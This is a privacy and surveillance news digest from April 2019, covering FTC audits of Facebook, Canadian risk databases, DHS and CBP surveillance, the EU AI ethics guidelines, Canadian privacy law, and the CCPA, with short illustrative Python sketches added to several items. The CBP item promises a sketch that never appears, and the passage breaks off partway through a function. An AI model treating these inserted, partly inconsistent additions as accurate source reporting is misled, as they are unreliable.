Intel. [Disruptive Competition Project]

US – Facebook Poised to Fight Disclosure of U.S. Privacy Assessments

Facebook Inc. will seek to block disclosures from years’ worth of privacy reports it submitted to the U.S. Federal Trade Commission, according to filings in an Electronic Privacy Information Center FOIA lawsuit seeking the release of information in the documents [see background, EPIC’s original 12 pg PDF Complaint filed with the US District Court in D.C. & FTC’s 9 pg PDF Answer to the court]. Facebook told the FTC and EPIC of its plans during an April 9 conference call. The judge gave Facebook until May 3 to file. As part of a 2011 settlement [see FTC PR here, 10 pg PDF 2011 consent decree here & 9 pg PDF 2012 consent order here] resolving charges that Facebook deceived users when it said they could keep their data private, the company had to submit to privacy assessments every other year for 20 years to document that it had enough controls to protect user data. Facebook hired PricewaterhouseCoopers LLP to conduct the reviews. In three reports that the FTC has made public [access PDF reports & docs], with dozens of pages blanked out, PwC concluded the privacy program was working. Questions about the accuracy and thoroughness of those checkups have arisen amid a string of scandals and missteps in how the world’s largest social media site has been handling user data. “Is there something hidden in the audits that we can’t see that explains the other things that we now know about?” said Alan Butler, a senior counsel at EPIC, referring to Facebook’s repeated privacy scandals. “Or is there some problem in the audits and the audit process?” Facebook and PwC declined to comment. The FTC didn’t immediately respond to requests for comment. EPIC is challenging redactions of the privacy audits that the FTC made under measures designed to protect business and trade secrets. The group can argue that an agency has failed to show that releasing the information would cause “competitive harm,” Butler said. It’s not always easy to say whether an agency should treat business information as confidential, particularly with respect to privacy protections, which some tech companies now view as part of their competitive value, said Alysa Hutnik, who chairs the privacy practice at Kelley Drye & Warren LLP. She said Facebook may seek to postpone the case because a dispute over similar issues is headed to the Supreme Court. [Bloomberg]

RFID / IoT

US – NIST Accepting Comments on IoT Draft Document

The U.S. National Institute of Standards and Technology and the National Cybersecurity Center of Excellence announced they will accept comments on the draft “Securing Small-Business and Home Internet of Things (IoT) Devices: Mitigating Network-Based Attacks Using Manufacturer Usage Description (MUD)“ document until June 24. The groups ask internet-of-things device manufacturers whether the guide gives them a better understanding of how to implement “manufacturer usage descriptions” in their products. Network equipment manufacturers are asked if they would consider supporting MUD in their offerings, while communication service providers are prompted to say whether the guide helped in “understanding how wide deployment of MUD could help reduce distributed denial-of-service attacks.” (A sketch of the MUD idea follows below.) [NCCOE]
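For readers new to MUD (specified in RFC 8520): a manufacturer publishes a file describing the network endpoints its device is intended to talk to, and network equipment enforces a default-deny policy around that declaration. The Python sketch below mimics that idea with an invented descriptor and hostnames; real MUD files are JSON documents carrying YANG-modeled access lists, not Python dicts.

# Illustrative only: a manufacturer declares the only endpoints its
# device should talk to, and the network drops everything else.
# The device name and hostnames below are invented.
mud_style_descriptor = {
    "device": "example-thermostat",
    "allowed-destinations": {"update.example.com", "telemetry.example.com"},
}

def permit(destination_host: str) -> bool:
    """MUD-style default-deny: allow only declared destinations."""
    return destination_host in mud_style_descriptor["allowed-destinations"]

for host in ("update.example.com", "botnet-c2.example.net"):
    print(host, "->", "allow" if permit(host) else "drop")

This default-deny posture is what makes MUD useful against DDoS botnets: a compromised device that tries to reach an undeclared command-and-control host is simply cut off.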

Security

CA – Security Startup to Give High-Tech Scanners Test Run at Rogers Arena

The next generation of high-tech security scanners will use advanced radar, 3D imaging and AI to unobtrusively screen sports fans, and the people entering Rogers Arena could be early test subjects for one company’s bid to enter the field. If all the pieces fall into place, Liberty Defense Technologies, a Vancouver-headquartered startup with an engineering lab in Atlanta, will have a prototype of what it’s calling HEXWAVE technology [watch short explanatory videos here & here] ready by the summer for initial testing in the lab, then beta-testing with security teams at venues, such as Rogers Arena, after that. HEXWAVE scanners operate from pairs of 60-centimetre-by-two-metre panels that transmit and receive low-powered radar waves that generate images with high enough resolution to discern the difference between a benign object such as a cellphone and a threat such as a gun or a pipe bomb. The images are analyzed via artificial intelligence, which alerts security when a threat is detected, and company CEO Bill Riker said it will be able to do so in real time as people walk through, unlike existing scanners that require subjects to stop as a device sweeps around them, and physical checks that are cumbersome and time-consuming. Canucks Sports and Entertainment owner Francesco Aquilini is an adviser to Liberty Defense and has signed a memorandum of understanding to use the arena as a test site, which the companies will be announcing April 15 [read PR here]. [Vancouver Sun | Rogers Arena to test new concealed-weapons detection technology]

CA – Canadian Cops Will Scan Social Media to Predict Who Could Go Missing

Documents obtained by Motherboard from Ontario’s Ministry of Community Safety and Correctional Services (MCSCS) through an access to information request show that police, social services, and health workers in Canada are using shared databases to track the behaviour of vulnerable people—including minors and people experiencing homelessness—with little oversight and often without consent. At least two provinces—Ontario and Saskatchewan—maintain a “Risk-driven Tracking Database” that is used to amass highly sensitive information about people’s lives [see access platform here]. Information in the database includes whether a person uses drugs, has been the victim of an assault, or lives in a “negative neighborhood.” The Risk-driven Tracking Database (RTD) is part of a collaborative approach to policing called the Hub model that partners cops, school staff, social workers, health care workers, and the provincial government. Information about people believed to be “at risk” of becoming criminals or victims of harm is shared between civilian agencies and police and is added to the database when a person is being evaluated for a rapid intervention intended to lower their risk levels. Interventions can range from a door knock and a chat to forced hospitalization or arrest. Data from the RTD is analyzed to identify trends—for example, a spike in drug use in a particular area—with the goal of producing planning data to deploy resources effectively and creating “community profiles” that could accelerate interventions under the Hub model, according to a 2015 Public Safety Canada report. Saskatchewan and Ontario officials say data in the RTD (sometimes called the “Hub database” in Saskatchewan) is “de-identified” by removing details such as people’s names and birthdates, though experts Motherboard spoke to said that scrubbing data so it may never be used to identify an individual is difficult if not impossible (a toy illustration of this linkage risk appears after this item). A Motherboard investigation—which involved combing through MCSCS, police, and city documents—found that in 2017, children aged 12 to 17 were the most prevalent age group added to the database in several Ontario regions, and that some interventions were performed without consent. In some cases, children as young as six years old have been subject to intervention. Particularly concerning for privacy advocates is the possibility that the RTD is being used for the purposes of predictive policing—a controversial strategy that employs data analysis to identify hot spots for crime. A report produced by Public Safety Canada in 2015 notes that data gathered during Hub discussions can be used to help “identify and plan predictive risk patterns at local, regional, and provincial levels.” The information in the RTD can help to accelerate interventions in some communities, the report states. Critics say that predictive models will lead to false positives and could disproportionately affect vulnerable communities. [The remainder of this long 2,500-word article examines the following]: 1) How does people’s information get added to the database?; 2) What’s in the database?; and 3) Predictive policing concerns.
[Motherboard | RCMP’s Social Media Surveillance Symptom of Broad Threat to Privacy, Says BCCLA | ‘Project Wide Awake’: How the RCMP Watches You on Social Media | Police in Canada Are Tracking People’s ‘Negative’ Behavior In a ‘Risk’ Database | The Canadian Government Is Going to Scan Social Media to See If You Smoke Pot | Academics Confirm Major Predictive Policing Algorithm is Fundamentally Flawed | Canada’s ‘Pre-Crime’ Model of Policing Is Sparking Privacy Concerns]
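The experts’ skepticism about “de-identified” data is easy to demonstrate. In the toy Python sketch below (all records invented), a record stripped of name and birthdate is still re-identified by linking its remaining quasi-identifiers against an outside dataset:

# Toy re-identification by linkage: the "de-identified" record keeps
# quasi-identifiers (age, postal prefix, gender) that match exactly
# one person in an outside dataset. All records here are invented.
deidentified_row = {"age": 17, "postal_prefix": "S7K", "gender": "F"}

public_dataset = [
    {"name": "Person A", "age": 17, "postal_prefix": "S7K", "gender": "F"},
    {"name": "Person B", "age": 42, "postal_prefix": "S7K", "gender": "F"},
    {"name": "Person C", "age": 17, "postal_prefix": "R2C", "gender": "M"},
]

matches = [
    p["name"] for p in public_dataset
    if all(p[k] == v for k, v in deidentified_row.items())
]
print(matches)  # ['Person A']: a unique match re-identifies the record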

Smart Cities

CA – CCLA sues Canadian Governments over Sidewalk Labs

The Canadian Civil Liberties Association has filed a lawsuit against all three levels of the Canadian government over the Waterfront Toronto smart-city project. The CCLA seeks court orders to terminate the agreement between Sidewalk Labs and Waterfront Toronto. The group has also pushed for a declaration that states Waterfront Toronto, Ontario and the Canadian federal government violated citizens’ privacy rights under the Canadian Charter of Rights and Freedoms. “Sidewalk Labs fully supports a robust and healthy discussion regarding privacy, data ownership and governance,” Sidewalk Spokesperson Keerthana Rang said via email. “We look forward to submitting our proposal to Waterfront Toronto and to continuing to work with Torontonians to get this right.” [Motherboard]

Surveillance

US – United Airlines Blocks Seatback Cameras Amid Privacy Backlash

Following customer complaints about privacy concerns, United Airlines is covering up seatback cameras in all its aircraft. Several airlines, including United, admitted that the cameras existed but were never going to be used. “None of these cameras were ever activated, and we had no plans to use them in the future; however, we took the additional step to cover the cameras. The cameras are a standard feature that manufacturers of the system included for possible future purposes such as video conferencing,” United Airlines Spokeswoman Andrea Hiller said. The privacy debate regarding the cameras came after a Singapore Airlines passenger discovered a camera on the seat in front of him. [USA Today]

US Government Programs

US – DHS Aims for More Airplane Facial Recognition by 2023

The U.S. Department of Homeland Security has laid out a four-year plan to have facial-recognition technology cover 97% of departing airplane passengers. DHS states in a report that U.S. Customs and Border Protection can achieve its 2023 goal through partnerships with airports and airlines and through expansion of the “Biometric Exit” program, which cross-references images of departing passengers with previously stored images from visa and passport applications (a toy sketch of the matching step appears below). While CBP reported the program identified 7,000 passengers who had overstayed visas, privacy advocates argue the facial-recognition tech raises civil rights concerns regarding the information it collects. Meanwhile, the U.S. Federal Bureau of Investigation is under fire for ignoring government concerns about the privacy and accuracy standards of its facial-recognition technology. [The Hill]
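The matching step in systems of this kind typically compares a face embedding from a gate photo against stored enrollment embeddings and accepts the best match above a confidence threshold. The Python sketch below illustrates that logic with random vectors; the 128-dimension embeddings and the 0.99 threshold are illustrative assumptions, not CBP’s actual pipeline or settings.

import numpy as np

# Compare a gate photo's embedding against a stored gallery and accept
# the best match only above a confidence threshold. All vectors here
# are synthetic stand-ins for real face embeddings.
def cosine(a: np.ndarray, b: np.ndarray) -> float:
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

rng = np.random.default_rng(0)
gallery = {"traveler-123": rng.normal(size=128)}          # stored enrollment
probe = gallery["traveler-123"] + rng.normal(scale=0.01, size=128)

scores = {tid: cosine(emb, probe) for tid, emb in gallery.items()}
best_id, best = max(scores.items(), key=lambda kv: kv[1])
print(best_id if best >= 0.99 else "no match", round(best, 4))

The threshold is the policy lever: set it low and the system returns more matches, including wrong ones; set it high and it returns fewer, more reliable matches.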

US – CBP’s New Social Media Surveillance: A Threat to Free Speech and Privacy

U.S. Customs and Border Protection (CBP) released a required Privacy Impact Assessment (PIA) on March 27 for the social media monitoring it carries out as part of its new Situational Awareness Initiative. The release of the assessment may have come in response to a March 6 report from NBC7 in San Diego revealing that the U.S. government created a surveillance target list of “Suspected Organizers, Coordinators, Instigators and Media.” The list featured journalists, activists, social media influencers, and lawyers working on immigration issues [see recent coverage here]. The list included names and photos of each individual – including 40 Americans and 19 others – as well as information on whether they had alerts placed on their passports and their connection to the migrant caravans traveling from Central America to the United States. Social media was clearly a source of information in compiling the list – some of the photos were copied from social media profiles, and three people were described as “administrator on caravan support Facebook page.” According to the PIA, as part of the initiative, CBP continuously monitors social media sites using web-based platforms and other tools in order to provide awareness of breaking news, “natural disasters, threats of violence, and other harmful events.” The surveillance target list seems to have been part of these “situational awareness“ efforts, though given the lack of transparency surrounding the department’s various surveillance programs, we cannot know for certain. CBP’s use of automated tools further muddles what gets categorized as “dangerous or threatening.” As numerous empirical studies have proven, automated tools have trouble correctly interpreting social media posts due to the context-dependent nature of social media and the frequent use of humor, sarcasm, and non-standard language. Tools with the highest accuracy rates for English-language processing still misinterpret content 20% to 30% of the time. So, innocuous posts scooped up because they contain keywords like “immigration,” “terrorism,” or “border” may easily be misinterpreted and flagged as a threat. Situational awareness social media information containing all sorts of personal information may be stored in various DHS databases, though details are scant. The PIA only specifies that online posts containing “credible threats“ against particular CBP agents are stored in a system that mainly holds employee misconduct and disciplinary records. Considering that “credible threats” are likely only a small subset of situational awareness data, the lack of discussion of where the rest of the data is stored is a glaring omission. Additionally, CBP agents may use “situational awareness” information for “link analysis,” that is, identifying possible associations among data points, people, groups, events, and investigations. For link analysis, CBP agents first use the CBP Intelligence Records System (CIRS) to amass information about a huge number of individuals from social media and other public and governmental sources. Then, the analytical tools in another system, CBP’s Analytic Framework for Intelligence (AFI), are used to conduct link analysis on CIRS data to identify “non-obvious relationships“ between individuals or entities (a toy sketch of this technique follows the item below).
Giving DHS’s ever-expanding intelligence apparatus carte blanche to monitor constitutionally protected online activities that are either “pertinent” to broadly defined law enforcement priorities or appear “threatening or dangerous” should never be “standard practice.” CBP’s efforts to map out the networks and activities of Americans through link analysis and social media monitoring pose a serious threat to the rights of free speech and association. [Just Security]

US – NSA Recommends Ending Phone-Records Program

Amid a growing belief that the program has become a logistical quagmire and provides limited national security benefit, the U.S. National Security Agency has recommended that the White House abandon a surveillance program that collects data from U.S. phone calls and text messages. Legal compliance issues halted the use of the phone-records program earlier this year, but it is ultimately up to the White House to push for legislation that would renew the program. Meanwhile, members of intelligence agencies belonging to the Five Eyes, including agencies across Australia, Canada, New Zealand, the U.K. and U.S., are expected to make their first joint public appearance to discuss their collaboration at this week’s CyberUK conference in Glasgow, Scotland. [WSJ.com]

US Legislation

US – Lawmakers Struggle to Draft Online Privacy Bill

U.S. lawmakers drafting a bill to create rules governing online privacy are intensifying their efforts and hope to have a discussion draft complete by late May, with a Senate committee vote during the summer, but disputes are likely to push that timetable back, according to sources familiar with the matter. Democratic Senators Richard Blumenthal, Brian Schatz and Maria Cantwell, who are leading the effort to draft the measure along with Republican Senators Jerry Moran, Commerce Committee Chairman Roger Wicker and the Senate’s No. 2 Republican, John Thune, met late Tuesday for 45 minutes in Thune’s Capitol Hill office to discuss the status of the effort and identify issues where senators disagree and will need to negotiate. They could meet again as early as next week. “We’re in the early stages,” Thune said. For a big legislative undertaking, he said, he thought the group was in a “pretty good place,” but he acknowledged it is “not an easy lift” to win agreement. The U.S. Senate Committee on Commerce, Science and Transportation will hold a hearing on the matter on Wednesday [notice and details — the committee also met on Tuesday for a hearing titled “Strengthening the Cybersecurity of the Internet of Things”; see notice & watch]. One dispute that has arisen is whether consumers whose privacy is violated by a company should be allowed to sue that company, with Democrats pushing for this to be allowed, according to one of the sources familiar with the discussions. At least one key Republican disagrees. “Senator Moran has heard serious concerns from the business community, particularly the small business community, that any private right of action would have serious ramifications in their sustainability. The senator is taking these considerations into account as he negotiates federal privacy legislation,” a representative for the senator said in an email statement. Democratic support for the privacy legislation is key since the measure will also have to pass the U.S. House of Representatives, which Democrats control, to become law; Republicans hold a majority in the Senate. A privacy bill is one of the few pieces of potential legislation that lobbyists believe has a decent chance of becoming law because it addresses a bipartisan concern and does not cost taxpayers money, according to a source following the matter. [Reuters]

Workplace Privacy

WW – Study: 61% of Employees Share Sensitive Info Via Email

Igloo Software’s “2019 State of the Digital Workplace“ report finds 61% of employees share sensitive information via email. The company polled 2,000 employees at companies with more than 250 staff members. Among other findings, 28% of respondents said they use instant messaging to deliver sensitive or private information, and 66% said they use non-approved communication apps to avoid tracking. [ZDNet]

US – Employers Continue Efforts to Monitor Staff in the Workplace

CNBC reports on the continued rise of employers monitoring their staff in the workplace and on whether privacy laws offer any protection from the practices. A 2018 Gartner study found 22% of companies around the world use employee-movement data, 17% monitor work-computer use, and 16% examine Microsoft Outlook and calendar data. Amazon recently received a patent for technology that detects warehouse workers’ locations, while Walmart has patented a system to listen in on its employees and customers. “Employees are in a difficult position. As more and more consumer privacy laws take shape, we’ve seen that there’s been a concern from companies that those privacy laws don’t apply to employees,” Electronic Frontier Foundation Senior Staff Attorney Lee Tien said. [CNBC]

 

+++

 

 

1-15 April 2019

Biometrics

AU – Committee Calls for Transparency over Australia’s Face-Matching Service

Australia’s Parliamentary Joint Committee on Law Enforcement has asked the government to be more transparent regarding plans to allow state and territory law enforcement access to the country’s face-matching service. In a report examining the impact of new and emerging information and communication technology, the committee called for safeguards that would protect against data breaches and urged the government to consider its recommendations for future strategies for biometric data and facial-recognition systems. [ZDNet]

US – Early Attempts at New York Driver Facial Recognition Fail

New York’s first attempts at employing facial recognition on its highways were unsuccessful. The Metropolitan Transportation Authority installed recognition software last year on the Robert F. Kennedy Bridge, which links Manhattan, the Bronx and Queens, and revealed in November that the technology “failed with no faces (0%) being detected within acceptable parameters” during its initial test period. The software’s pilot program and its evaluation are ongoing, according to the MTA. The poor results only fuel civil rights campaigners’ concerns over privacy and the technology’s inaccuracies; New York Civil Liberties Union technologist Daniel Schwarz calls the software “pervasive, real-time surveillance of everyone passing by.” [The Wall Street Journal]

EU – CNIL Adopts Model Regulation on Employers’ Use of Biometrics

After a public consultation, France’s data protection authority, the CNIL, has adopted a model regulation on biometrics in the workplace [English translation & notice in French & English translation – also see CNIL’s FAQ & English translation]. The model regulation states companies can install “biometric access control devices” as long as they comply with the agency’s rules. Organizations must be able to justify their use of biometric data and follow the obligations set out in the EU General Data Protection Regulation. Employers must document any decisions they make about biometric devices, and data controllers are required to conduct a data protection impact assessment. The CNIL has also set up a frequently asked questions page to help companies meet the new requirements. [CNIL.fr | Privacy & Information Security Law Blog (HuntonAndrewsKurth) | CNIL sets rules for biometric employee time and attendance systems in France]

Big Data / Analytics / Artificial Intelligence

US – AI Researchers Ask Amazon to Stop Selling Facial-Recognition Tech to Law Enforcement

A group of artificial intelligence researchers has asked Amazon to no longer sell facial-recognition technology to law enforcement. Researchers from Google, Facebook, Microsoft and several universities around the world signed a letter addressed to Amazon. The researchers state Amazon’s facial-recognition technology has been shown to have higher error rates when used on women and people of color. The letter also addressed points made by Amazon Web Services General Manager of Artificial Intelligence Matt Wood and AWS Vice President of Global Public Policy Michael Punke. [NY Times]

EU – European Commission Releases Final Ethics Guidelines for Trustworthy AI

On April 8, 2019, the European Commission’s High-Level Expert Group (HLEG) on Artificial Intelligence released the final version of its Ethics Guidelines for Trustworthy AI [see PR, notice]. The Guidelines’ release follows a public consultation process in which the HLEG received over 500 comments on its initial draft version. The Guidelines outline a framework for achieving trustworthy AI and offer guidance on two of its fundamental components: A) that AI should be ethical; and B) that it should be robust, both from a technical and a societal perspective. The Guidelines intend to go beyond a list of principles and operationalize the requirements for realizing trustworthy AI. The Guidelines consist of three chapters: 1) the ethical principles and values that must be respected in the development, deployment and use of AI systems; 2) seven requirements that AI should meet to be trustworthy (i.e., human agency and oversight; technical robustness and safety; privacy and data governance; transparency; diversity, non-discrimination and fairness; environmental and societal well-being; and accountability); and 3) a trustworthy AI assessment list reflecting the second chapter’s requirements. The list is non-exhaustive and intended to be applied flexibly depending on the AI use at hand. The HLEG plans to launch a pilot test phase based on its trustworthy AI assessment list, which will involve a range of stakeholders, including industry, research institutes and public authorities. Interested organizations can sign up to the European AI Alliance to be notified when the pilot commences. Early next year, following the pilot, the HLEG will review any feedback it receives and revise the list as appropriate. [Privacy & Information Security Law Blog (Hunton Andrews Kurth) | How the EU’s AI ethics guidelines will impact US businesses | The EU releases guidelines to encourage ethical AI development | AI systems should be accountable, explainable, and unbiased, says EU]
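As a rough illustration of how an organization might operationalize the seven requirements as an internal self-assessment, consider the Python sketch below. The example questions are paraphrases invented here; they are not the HLEG's official assessment list.

# Hypothetical self-assessment skeleton built around the HLEG's seven
# requirements. The questions are illustrative, not the official list.
REQUIREMENTS = {
    "human agency and oversight": "Can a human override or contest the system's output?",
    "technical robustness and safety": "Has the system been tested against adversarial inputs?",
    "privacy and data governance": "Is a documented lawful basis in place for all training data?",
    "transparency": "Can decisions be explained to affected users?",
    "diversity, non-discrimination and fairness": "Have error rates been measured across demographic groups?",
    "environmental and societal well-being": "Has the system's broader impact been assessed?",
    "accountability": "Is there a named owner responsible for audit and redress?",
}

def open_items(answers: dict) -> list:
    """Return the requirements not yet answered affirmatively."""
    return [req for req in REQUIREMENTS if not answers.get(req, False)]

print(open_items({"transparency": True, "accountability": True}))
# Prints the five requirements still unaddressed.

A flexible, non-exhaustive checklist of this kind matches the Guidelines' stated intent: the assessment list is meant to be adapted to the AI use at hand rather than applied mechanically.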

Canada

CA – OPC Signals Major Change on Cross-Border Data Transfers

Faced with a decades-old private-sector privacy law [PIPEDA: see OPC Guidance], the Office of the Privacy Commissioner of Canada (OPC) has embarked on a dramatic reinterpretation of the law premised on incorporating new consent requirements. The strained interpretation arose when the OPC released a consultation paper signalling a major shift in its position on cross-border data transfers. Canadian privacy law has long relied on an “accountability principle” to ensure that organizations transferring personal information across borders to third parties remain ultimately responsible for safeguarding that information. That enabled Canadian companies to outsource data-processing activities to other jurisdictions so long as they used contractual provisions to guarantee appropriate safeguards. The federal privacy commissioner now seems ready to reverse that long-standing approach. The OPC position is a preliminary one – the office is accepting comments in a consultation until June 4 – but there are distinct similarities with its attempt to read a right to be forgotten into Canadian law [see Geist’s contrary opinion]. Despite the absence of a right-to-be-forgotten principle in the statute, the OPC simply ruled that it was reading a right to de-index search results into PIPEDA [OPC PR & position paper]; that issue is currently being challenged before the courts. In this case, the absence of meaningful updates to Canadian privacy law for many years has led to another exceptionally aggressive interpretation of the law by the OPC, effectively seeking to update the law through interpretation rather than actual legislative reform. The OPC believes its position is consistent with Canada’s international trade obligations, but the Comprehensive and Progressive Agreement for Trans-Pacific Partnership (CPTPP) features a commitment to allow cross-border transfers of information by electronic means. It limits restrictions on the open-border principle for data transfers, stipulating that any limitations may not be arbitrary, discriminatory or a disguised restriction on trade. Moreover, any limits cannot be greater than those required to achieve a legitimate policy objective. The Canada-U.S.-Mexico Agreement contains similar language. The imposition of consent requirements for cross-border data transfers could be regarded as a non-tariff barrier to trade that imposes restrictions greater than those required to achieve the objective of privacy protection, especially given that PIPEDA has long been said to provide such protections without the need for this additional consent regime. [The Globe and Mail | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing]

CA – OPC, Chief Electoral Officer Release Guidance on Political Party Data Protection

On April 1, federal Privacy Commissioner Daniel Therrien and Chief Electoral Officer Stéphane Perrault advised Canada’s federal political parties to play it straight with the personal information of voters they hold [see Guidance for federal political parties on protecting personal information & PR]. They issued the guidance because the Trudeau government has declined to make federal parties subject to privacy law. Instead, under recent changes to the Canada Elections Act [see amendment bill & some guidance], which have come into effect, federal political parties must declare specific privacy policies they will follow; those policies have to be approved by Elections Canada by July 1. The guidance is summarized in four points: 1) Be transparent by clearly explaining what personal information will be used for, whether it will be shared with others and for what purpose; 2) Obtain meaningful consent for the collection, use and disclosure of personal information, and only use the information for purposes individuals have consented to – for example, parties should not assume consent to add personal information collected through social media to party databases simply because people interact with a party by liking a post on social media; 3) Provide individuals with access to their information and the opportunity to correct it; and 4) Keep personal information only as long as necessary to satisfy the purposes for which it was collected, and then destroy the information securely – for example, information collected for a specific petition or cause should not be reused for general political messaging. The guidance also includes a list of six obligations imposed on federal parties under the new elections law and some questions party officials might ask themselves to see if they meet those duties. As an extra aid, the guidance includes a list of best practices for protecting information. [IT World Canada | Federal parties urged to bolster privacy protections beyond what the law requires ahead of 2019 election | New privacy guidelines issued for political parties in wake of blanket text messages | Canada’s political parties should respect citizen’s privacy rights, watchdog says | Can politicians send you unsolicited text messages? Here are the rules in Canada]

CA – OIPC NU: Nunavut Government Now Less Responsive to Info-Privacy Law

Elaine Keenan Bengts, Nunavut’s information and privacy commissioner, told the legislative assembly’s Standing Committee on Government Oversight and Public Accounts on April 11 that she has seen a decline in how well territorial public bodies follow the territory’s Access to Information and Protection of Privacy Act. Over her 18 years as commissioner, Keenan Bengts said, Government of Nunavut agencies have been largely responsive to the act, but she has seen a shift in recent years: fewer are meeting deadlines or responding to her recommendations. The hearings focused largely on the commissioner’s most recent report, from 2017-18, which outlines the 26 reviews issued by her office over that period. Of those 26 reviews, 19 did not receive a response from the appropriate department within the 30-day timeline, Keenan Bengts said. “In only five of the 21 reviews in which I received a response were my recommendations accepted,” she said. “Until a few years ago, I would estimate about 90% of my recommendations were accepted.” Nunavut’s Department of Culture and Heritage had the largest number of requests for reviews, all of them stemming from a single applicant who had filed access to information requests related to the discovery of the Franklin expedition ships. “I probably wrote 20 letters to the minister himself, asking that he respond, time and time again. I got some responses some of the time,” Keenan Bengts told the hearing. “Most often, I got no response whatsoever.” According to Keenan Bengts, “There have been a number of breaches.” Privacy tends to be violated more easily in smaller communities, she said, giving the example of a serious health information breach her office investigated in which an individual went to their local landfill and recovered a Department of Health hard drive containing medical information from a number of people in the community. In another privacy breach her office investigated, credentials meant to be assigned to a new Department of Health employee were mistakenly assigned to a Department of Justice employee with a similar name; the error went unnoticed by the GN for six months. “The Justice employee was regularly going through the medical records,” she said. Forty-three Government of Nunavut departments, agencies and corporations currently fall under Nunavut’s Access to Information and Protection of Privacy Act. That will change soon: the act was amended in 2017 to allow municipalities and education authorities to become public bodies under the act, which would make them subject to the legislation. But Keenan Bengts warns that those organizations will all need training and resources before they are ready to meet their obligations under the act. Nunavut is also the only jurisdiction in Canada without health-specific privacy legislation, an issue the Department of Health said it intends to start work on soon. Keenan Bengts’ term as information and privacy commissioner comes to an end in March 2020, when she intends to retire. [Nunatsiaq News]

Consumer

US – Consumers Express Privacy Concerns, but Actions Say Otherwise

While consumers say they are concerned about their privacy, studies show they have not taken steps to protect themselves. A PricewaterhouseCoopers study found 92% of consumers said they should have control over their data, and 71% said they would no longer conduct business with an organization that shared their information without consent. However, an IBM survey found only 45% updated their privacy settings after a data breach, and only 16% stopped interacting with a compromised organization. “People say they’re worried, but they don’t vote with their fingers, so to speak,” said PwC Cybersecurity and Privacy Principal Jay Cline. Meanwhile, an Integris Software study found 79% of companies support a federal U.S. privacy law, but only 23% are ready for the California Consumer Privacy Act and 36% are compliant with the EU General Data Protection Regulation. [Axios]

US – Surveys: US Consumers Lack Trust When Sharing Data

Studies by the Dentsu Aegis Network and Clever Real Estate reveal U.S. consumers are not confident firms can protect their data. Dentsu polled 43,000 people globally for “The Digital Society Index 2019: Human Needs in a Digital World,” which found only 41% of U.S. consumers have faith in companies’ data protection capabilities, while 75% of U.S. consumers would stop doing business with a firm that misused their data. Clever Real Estate surveyed 1,139 Americans, finding that 95% have privacy concerns about their social media accounts. Privacy issues on Facebook concerned 80% of respondents, while 86% said they have decided whether to share data with a website or app based on how it looks. [MediaPost]

US – Poll: Americans Do Not Trust Tech Companies, Federal Government with Data Protection

A recent survey shows a majority of Americans lack confidence in the federal government’s and tech companies’ data protection capabilities. The joint poll of 1,000 American adults by The Wall Street Journal and NBC News reveals skepticism regarding data safety at Amazon, Google and Facebook, as well as the U.S. government. At least 75% of those surveyed have either no trust or limited trust in any of the four entities. Facebook has the least credibility among respondents, with only 6% expressing confidence in the company. The poll also shows 54% of Americans want more federal regulation and oversight of social media companies, and 90% said that sharing or selling access to a consumer’s personal information should require user permission. [The Wall Street Journal]

US – Services Analyze Consumer Data to Determine Trustworthiness Score

The Wall Street Journal reports on the use of fraud-detection service companies. One such company, Sift, helps establish a trustworthiness score and determine whether an entity is interacting with a bot or a risky human. In many ways, Sift compiles a score similar to a credit score, loading and evaluating consumers’ personal data, with one key difference: the consumer has no way of accessing their Sift score. While Sift and others claim to be compliant with privacy regulations, including the EU General Data Protection Regulation, the article points out, “In the gap between who is taking responsibility for user data — Sift or its clients — there appears to be ample room for the kind of slip-ups that could run afoul of privacy laws.” [The Wall Street Journal]
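Sift's model is proprietary, so the following toy Python sketch is only meant to show the general shape of such scoring: behavioral signals weighted and combined into a single number, much like a credit score. The signals, weights, and scale are invented for illustration.

# Toy "trust score": a weighted combination of behavioral signals,
# clamped to a 0-100 scale. All signals and weights are invented;
# Sift's actual model is proprietary and far more complex.
SIGNAL_WEIGHTS = {
    "account_age_days": 0.3,    # older accounts look less risky
    "failed_logins": -2.0,      # repeated failures look riskier
    "disposable_email": -15.0,  # throwaway email domains look riskier
    "verified_phone": 10.0,     # verified contact details look safer
}

def trust_score(signals: dict) -> float:
    """Weighted sum of signals, shifted to and clamped on a 0-100 scale."""
    raw = 50.0 + sum(SIGNAL_WEIGHTS[k] * v for k, v in signals.items())
    return max(0.0, min(100.0, raw))

print(trust_score({"account_age_days": 30, "failed_logins": 4,
                   "disposable_email": 1, "verified_phone": 0}))  # 36.0

The privacy objection the article raises survives any particular choice of model: unlike a credit score, the inputs, weights, and final number are all invisible to the person being scored.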

Education

US – New CCPA Rules for Privacy in the Education Sector

The California Consumer Privacy Act (CCPA) becomes effective in January 2020 and may impact companies in the education sector, including the larger education technology companies. The CCPA applies to for-profit businesses that collect the personal information of California consumers and meet at least one of the following criteria: a) annual gross revenue over US$25 million; b) buying, receiving, selling, or sharing the data of over 50,000 California residents annually for commercial purposes; or c) deriving over 50% of annual revenue from selling consumer information. The CCPA also applies to service providers that process consumer information on behalf of qualifying business entities. While the CCPA does not apply to non-profit educational institutions, it may apply to certain for-profit educational institutions, third-party service providers, and others in the education space. If an educational entity meets the threshold requirements, or it processes information on behalf of such an entity, it should prepare for the CCPA. Regulated educational entities should pay particular attention to the following key requirements of the CCPA: 1) Maintain public disclosures that outline the rights listed in the CCPA and the categories of personal information that are collected, sold, or disclosed for business purposes (e.g., a for-profit university would post a disclaimer on its website that it purchases phone numbers of prospective students); 2) Allow consumers to receive information detailing what personal information has been collected, sold, or disclosed by the business in question (e.g., if requested by a student, an online program management (OPM) provider would disclose that it has distributed student email addresses to partner institutions); 3) Delete consumers’ personal information upon request, subject to a number of exceptions (e.g., a for-profit computer programming “boot camp” would delete a student’s mailing address from its database after a request is sent); and 4) Allow consumers to opt out of the sale of personal information (e.g., a for-profit university would place a “do not sell my personal information” link on its homepage). Once the law is in effect, the California attorney general’s office will have jurisdiction over enforcement. Businesses have 30 days to cure alleged violations; if they are not cured, the attorney general’s office can levy civil penalties of up to US$7,500 per intentional violation. Moreover, the CCPA authorizes a limited private right of action for consumers whose personal information is subject to unauthorized disclosure. [Chronicle of Data Protection (Hogan Lovells)]
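For concreteness, the threshold test above can be expressed as a short Python function. The criteria follow the summary in this item; the function name and the example figures are hypothetical.

# Sketch of the CCPA applicability test as summarized above.
# The entity data in the example call is invented.
def ccpa_applies(for_profit: bool,
                 annual_revenue_usd: float,
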